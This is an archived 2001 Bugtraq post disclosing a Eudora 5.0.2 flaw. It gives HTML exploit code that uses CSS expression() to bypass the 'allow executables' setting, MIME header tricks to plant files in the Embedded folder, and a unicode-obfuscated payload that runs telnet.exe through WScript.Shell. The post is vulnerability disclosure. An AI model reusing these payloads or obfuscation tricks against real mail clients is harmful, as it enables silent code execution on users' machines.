[19749] in bugtraq
Re: feeble.you!dora.exploit
daemon@ATHENA.MIT.EDU (http-equiv@excite.com)
Wed Mar 21 16:23:57 2001
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <10359935.985189714218.JavaMail.imail@slippery>
Date: Wed, 21 Mar 2001 07:48:28 -0800
Reply-To: http-equiv@excite.com
From: "http-equiv@excite.com" <http-equiv@excite.com>
To: BUGTRAQ@SECURITYFOCUS.COM
Further to all of this, we include a generic more illustrative (and user
friendly test working example) [at the end of this batch of quotes].
This defeats the so-called "Allow executables in HTML content" being
disabled.
Example at the end of this screed.
On Tue, 20 Mar 2001 11:23:48 -0800 (PST), http-equiv@excite.com wrote:
| |Jeff Beckley wrote:
| |
| |>At 01:38 AM 3/18/2001 -0800, http-equiv@excite.com wrote:
| |>Silent delivery and installation of an executable on a target
| |>computer. No client input other than opening an email using
| |>Eudora 5.02 - Sponsored Mode provided 'use Microsoft viewer'
| |>and 'allow executables in HTML content' are enabled.
| |
| |
| |The "Allow executables in HTML content" setting is turned off by
| |default. The online help and user manual mention that the
| |setting should remain off for security reasons.
|
| This of course is 100% correct. Unfortunately on closer | examination
we find
| that this too can be defeated quite easily. Consider the following
| non-JavaScript:
|
|
| <!doctype html public "-//w3c//dtd html 4.0 transitional//en">
|
| <img
SRC="file://C:\WINDOWS\APPLIC~1\QUALCOMM\EUDORA\Embedded\malware.gif"
| height=2 width=2
| STYLE="left:expression(location.href='http://www.malware.com');"></html>
|
| <br>
| <br>
| </body></html>
|
| This slips through, with "Allow executables in HTML content" |disabled.
| therefore the results will be the same:
|
| <img SRC="" height=1 width=1
| STYLE="left:expression (malware.location.href='cid:malware.com');"></
|
| ...etc
|
| Disable the 'Microsoft Viewer" thing. That's the problem.
|
| A good repair can be by reviewing all the necessary tricks to inject
| JavaScript into Hotmail Accounts. These are well documented here and
dating
| back for quite some time. It appears the mail client seeks typical script
| tags, which is defeated as above. Additional you might want to not allow
a
| crafted inline file to transfer automatically to your embedded folder:
|
| Content-Type: application/octet-stream; charset=iso-8859-1
| Content-ID: <malware.com>
| Content-Transfer-Encoding: base64
| Content-Disposition: inline; filename="You!DORA.html"
|
| We note that if the content-type is manipulated we can route the file to
the
| 'Embedded' folder. Casual observation suggests image files and *.exe are
| routed there. While *.html is not, hence the constructed Content-Type:
| application/octet-stream; charset=iso-8859-1 while the file is:
| Content-Disposition: inline; filename="You!DORA.html"
|
|
| ---
| http://www.malware.com
|
|
This is specifically constructed to fire the ActiveX warning so that it is
visually illustrated (harmless WSH to fire telnet if you click okay)
REPEAT: this is by design and only for illustrative purposes (lest some
idiot complain this demo has a warning and is a lame "exploit").
<img SRC="cid:malware.com" height=2 width=2
STYLE="left:expression(document.write('\u0020\u0020\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0020\u0076\u0061\u0072\u0020\u0077\u0073\u0068\u003d\u006e\u0065\u0077\u0020\u0041\u0063\u0074\u0069\u0076\u0065\u0058\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0027\u0057\u0053\u0063\u0072\u0069\u0070\u0074\u002e\u0053\u0068\u0065\u006c\u006c\u0027\u0029\u003b\u0020\u0020\u0077\u0073\u0068\u002e\u0052\u0075\u006e\u0028\u0027\u0074\u0065\u006c\u006e\u0065\u0074\u002e\u0065\u0078\u0065\u0027\u0029\u003b\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0020\u003c\u0021\u002d\u002d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u006d\u0061\u006c\u0077\u0061\u0072\u0065\u002e\u0063\u006f\u006d\u0020\u0032\u0032\u002e\u0030\u0032\u002e\u0030\u0031\u0020\u002d\u002d\u003e'))">
Once again:
Tested on win98, IE5.5, "Eudora 5.0.2 -- Sponsored Mode", "Microsoft Viewer"
enabled, "Allow executables in HTML content" DISABLED.
end call
---
http://www.malware.com
_______________________________________________________
Send a cool gift with your E-Card
http://www.bluemountain.com/giftcenter/
